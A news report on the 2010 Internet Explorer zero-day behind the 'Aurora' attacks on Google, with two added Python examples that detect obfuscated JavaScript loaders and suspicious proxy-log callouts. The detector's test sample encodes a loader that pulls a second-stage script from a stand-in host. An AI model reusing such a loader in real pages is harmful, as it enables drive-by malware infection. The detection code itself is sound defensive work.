Computer security companies are scurrying to cope with the fallout from the Internet Explorer (IE) flaw that led to cyberattacks on Google and its corporate and individual customers.
The zero-day attack that exploited IE is part of a lethal cocktail of malware that is keeping researchers very busy.
“We’re discovering things on an up-to-the-minute basis, and we’ve seen about a dozen files dropped on infected PCs so far,” Dmitri Alperovitch, vice president of research at McAfee Labs, told TechNewsWorld.
The attacks on Google, which appeared to originate in China, have sparked a feud between the Internet giant and the nation’s government over censorship, and it could result in Google pulling away from its business dealings in the country.
Pointing to the Flaw
The vulnerability in IE is an invalid pointer reference, Microsoft said in security advisory 979352, which it issued on Thursday. Under certain conditions, the invalid pointer can be accessed after an object is deleted, the advisory states. In specially crafted attacks, like the ones launched against Google and its customers, IE can allow remote execution of code when the flaw is exploited.
A pointer is a programming language data type whose value points, or refers, to another value stored elsewhere in the computer’s memory. Pointers are also used to hold the addresses of entry points for called subroutines in procedural programming and for runtime linking to dynamic link libraries (DLLs). There are risks associated with using pointers because they allow both protected and unprotected access to memory addresses.
The attacks seen so far have targeted only IE 6, Redmond’s advisory states, although the exploit will work on IE 7 and IE 8 as well. On Windows operating systems starting with Vista, the impact of the vulnerability is limited by IE’s Protected Mode. On Windows Server 2003 and 2008, IE runs by default in a restricted mode known as “Enhanced Security Configuration,” which also mitigates the threat because it sets the security level for the Internet zone to high, according to Microsoft.
This attack can only be launched if victims go to infected Web sites. “An attacker would have no way to force users to visit these Web sites,” the advisory reads. The hackers use trickery, typically by getting victims to click on a link in an e-mail or instant message that takes them to the infected site.
Once a victim visits an infected Web site, the exploit of the IE flaw downloads a fake JPEG image; that file is then decoded and run to download further malware files, McAfee’s Alperovitch said. The creator of the link is still not known.
The Aurora Assault
The exploit can easily be tweaked to work with every version of the browser, McAfee’s Alperovitch pointed out. It consists of several files, each a different piece of malware. “The files have different capabilities, and we’re still conducting a comprehensive analysis,” Alperovitch said. “It’s possible there are other exploits that we haven’t discovered yet in this cocktail.”
Security vendors are pulling out all the stops to combat this attack. “We’ve got people working around the world 24 by seven on this thing, and have sent people out to several companies that were attacked to find out what happened,” Alperovitch said. Symantec and Juniper Networks are also investigating the attacks.
McAfee’s Security Insider Blog calls the attack “Aurora,” after the filepath on the attacker’s machine that was included in two of the malware binaries associated with the attack. That filepath is typically inserted by code compilers to indicate where debug symbols and source code are located on the developer’s PC.
Why were the attacks focused on Internet Explorer 6, which was launched back in 2001? Why had the more than 30 large enterprises that were apparently victims of the malware not upgraded to later versions of the browser, when they have the sophistication and technical resources to do so? “A lot of the companies that are victims are very large multinational corporations and have a lot of people, so upgrading takes a long time,” Alperovitch explained.
In any event, it would have been impossible to stop the attack, Michael Sutton, vice president of security research at Zscaler, told TechNewsWorld. “This is a zero-day exploit, so nobody was aware of this and they couldn’t filter it out,” he explained. “A targeted attack using a zero-day vulnerability is very difficult to protect against.”
A zero-day attack is one targeted at application vulnerabilities that are not widely known to the security industry, or even to the software developer.
The Manly Art of Computer Self-Defense
Protection against the attack was made more difficult because the malware authors were apparently expert coders. “The attack was obfuscated, and, aside from a bunch of binary characters that were in JavaScript, there’s very little JavaScript code that would be seen on the network by an intrusion detection system or antivirus or antispam software,” Michael Geide, senior security researcher at Zscaler, told TechNewsWorld. Most of the JavaScript was encrypted or encoded and would be decoded by the “small snippet” of JavaScript visible on the network, he explained.
Many antimalware packages either automatically block JavaScript or require users to approve running it on their computers. Obfuscated code is code that has been made difficult to read; malware authors obfuscate their code to make it difficult to detect.
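The pattern Geide describes, a small visible decoder next to one long encoded blob, is something a defender can score heuristically without executing the script. The following Python is an added example written for this article, not code from Zscaler, McAfee or the attack itself; the indicator list, the thresholds and both sample scripts are constructed (the obfuscated sample is built by percent-encoding a harmless loader that points at a reserved example host), and the helper names are hypothetical.

```python
import math
import re
from urllib.parse import unquote

# Calls a tiny visible loader uses to turn an encoded blob back into runnable
# script. Seeing one of these next to a single very long encoded literal is the
# "small snippet decodes the rest" shape described in the article.
DECODER_CALLS = re.compile(
    r"\b(eval|unescape|decodeURIComponent|String\.fromCharCode|document\.write)\s*\("
)
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
ESCAPE_SEQ = re.compile(r"\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2}")

# Constructed samples (not from the real attack). The obfuscated one is made by
# percent-encoding a harmless second-stage loader so the result is reproducible.
BENIGN_SAMPLE = (
    'function greet(name) { document.getElementById("msg").innerText = "Hello, " + name; }'
)
PAYLOAD_PLAINTEXT = (
    "var s = document.createElement('script'); "
    "s.src = 'http://stage2.example.invalid/next.js'; "
    "document.body.appendChild(s);"
)
OBFUSCATED_SAMPLE = (
    'var p = "' + "".join(f"%{ord(c):02x}" for c in PAYLOAD_PLAINTEXT) + '"; eval(unescape(p));'
)


def shannon_entropy(text):
    """Bits per character: encoded blobs score high, ordinary code scores low."""
    if not text:
        return 0.0
    n = len(text)
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def string_literals(script):
    """Extract double- and single-quoted literals (assumes no template strings)."""
    return [a or b for a, b in STRING_LITERAL.findall(script)]


def score_script(script):
    """Return the raw indicators plus a verdict; thresholds are tuning assumptions."""
    literals = string_literals(script)
    decoders = sorted({m.group(1) for m in DECODER_CALLS.finditer(script)})
    longest = max((len(s) for s in literals), default=0)
    escape_matches = ESCAPE_SEQ.findall(script)
    # Share of the whole script that is escape sequences: a loader that is
    # "mostly blob" is close to 1, normal code is near 0.
    encoded_fraction = sum(len(m) for m in escape_matches) / max(len(script), 1)
    entropy = max((shannon_entropy(s) for s in literals), default=0.0)

    score = 0
    score += 1 if decoders else 0
    score += 1 if ("eval" in decoders or "document.write" in decoders) else 0
    score += 1 if longest >= 200 else 0
    score += 1 if len(escape_matches) >= 20 else 0
    score += 1 if encoded_fraction >= 0.5 else 0
    score += 1 if entropy >= 4.0 else 0
    return {
        "decoders": decoders,
        "longest_literal": longest,
        "escape_sequences": len(escape_matches),
        "encoded_fraction": round(encoded_fraction, 2),
        "max_literal_entropy": round(entropy, 2),
        "score": score,
        "suspicious": score >= 3,
    }


def recover_percent_encoded(script):
    """Analyst helper: decode percent-encoded literals so the hidden stage can be
    read statically instead of run."""
    return [unquote(s) for s in string_literals(script) if ESCAPE_SEQ.search(s)]


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SAMPLE), ("obfuscated", OBFUSCATED_SAMPLE)):
        print(name, score_script(sample))
    print(recover_percent_encoded(OBFUSCATED_SAMPLE))
```

The scorer is deliberately a sum of independent indicators rather than a single regex: a legitimate minifier can produce one of them (a long literal, say), but a decoder call plus a long, mostly-escaped, high-entropy literal together is the loader shape, and `recover_percent_encoded` gives the analyst the second stage to read without ever evaluating it.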
Although the attacks hit Google corporate and individual customers, the Internet giant is not to blame, Sutton said. “Gmail didn’t really play any role in letting the attack occur; this was an Internet Explorer attack that was a combination of exploiting the email and good social engineering.”
Is there any way to protect against zero-day attacks? Yes, Sutton said. Instead of just relying on antivirus or antimalware software, get defense in depth. This means using several different applications to provide layers of defense.
“With multiple layers of protection, an attack might get past one layer, but other applications can see the results, such as binaries being downloaded or callouts to suspicious hosts, and meanwhile you’re monitoring your logs for suspicious activity,” Sutton explained. “If something gets past one layer, it will be detected by another.”
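Sutton's second layer, watching logs for binaries being downloaded and for callouts to suspicious hosts, is simple to put into practice. The following Python is an added example, not code from Zscaler or from the article: it parses a constructed proxy log, flags the two events Sutton names, and then correlates them per client, on the reasoning that a binary download followed shortly by a connection to a host nobody knows is worth an analyst's time even when the exploit itself was never recognised. The allowlist, the binary MIME types and extensions, the ten-minute window, the log format and every address in it are assumptions made for the example.

```python
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Assumed tuning values: hosts the organisation already knows, content we
# treat as executable, and how long after a download a callout still counts.
KNOWN_GOOD_HOSTS = {"intranet.example.test", "mail.example.test", "www.example.test"}
BINARY_TYPES = {"application/octet-stream", "application/x-msdownload", "application/x-dosexec"}
BINARY_EXTENSIONS = (".exe", ".dll", ".scr")
WINDOW = timedelta(minutes=10)

# Constructed proxy log: timestamp, client, method, URL, status, content type, bytes.
# 10.0.0.5 views an outside page, pulls a binary, then posts to a bare IP address;
# 10.0.0.9 only touches known hosts.
SAMPLE_LOG = """\
2010-01-14T10:02:11 10.0.0.5 GET http://intranet.example.test/home.html 200 text/html 1420
2010-01-14T10:05:40 10.0.0.5 GET http://cdn.example.invalid/img/photo.jpg 200 image/jpeg 18744
2010-01-14T10:05:43 10.0.0.5 GET http://cdn.example.invalid/img/a.exe 200 application/octet-stream 53248
2010-01-14T10:06:10 10.0.0.5 POST http://203.0.113.7:443/ 200 text/plain 312
2010-01-14T10:07:00 10.0.0.9 GET http://www.example.test/news.html 200 text/html 9001
2010-01-14T10:08:30 10.0.0.9 GET http://mail.example.test/attach/report.pdf 200 application/pdf 44000
"""


def parse_log(text):
    """Turn the space-separated log into dicts with typed fields."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status, ctype, size = line.split()
        records.append({
            "ts": datetime.fromisoformat(ts),
            "client": client,
            "method": method,
            "url": url,
            "host": urlparse(url).hostname,
            "status": int(status),
            "ctype": ctype,
            "bytes": int(size),
        })
    return records


def classify(rec):
    """Reasons a single request is interesting on its own (may be empty)."""
    reasons = []
    path = urlparse(rec["url"]).path.lower()
    if rec["ctype"] in BINARY_TYPES or path.endswith(BINARY_EXTENSIONS):
        reasons.append("binary download")
    if rec["host"] not in KNOWN_GOOD_HOSTS:
        reasons.append("callout to unknown host")
    return reasons


def flag_records(records):
    """Every request that trips at least one rule, with its reasons."""
    return [(r["url"], classify(r)) for r in records if classify(r)]


def correlate(records, window=WINDOW):
    """Escalate a client that downloads a binary and then, within the window,
    talks to a host outside the allowlist."""
    alerts = []
    by_client = {}
    for r in records:
        by_client.setdefault(r["client"], []).append(r)
    for client, recs in by_client.items():
        recs.sort(key=lambda r: r["ts"])
        for binary in (r for r in recs if "binary download" in classify(r)):
            later = [
                r for r in recs
                if binary["ts"] < r["ts"] <= binary["ts"] + window
                and "callout to unknown host" in classify(r)
            ]
            if later:
                alerts.append({
                    "client": client,
                    "binary": binary["url"],
                    "callouts": sorted({r["host"] for r in later}),
                })
    return alerts


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for url, reasons in flag_records(recs):
        print(url, reasons)
    for alert in correlate(recs):
        print("ESCALATE", alert)
```

Individually, each flagged line is noisy (plenty of legitimate traffic goes to hosts not on an allowlist), which is why the correlation step exists: it reports the sequence rather than the events, so the analyst sees one alert for the client that fetched a binary and then phoned a bare IP address, and nothing for the client that only read mail and a PDF.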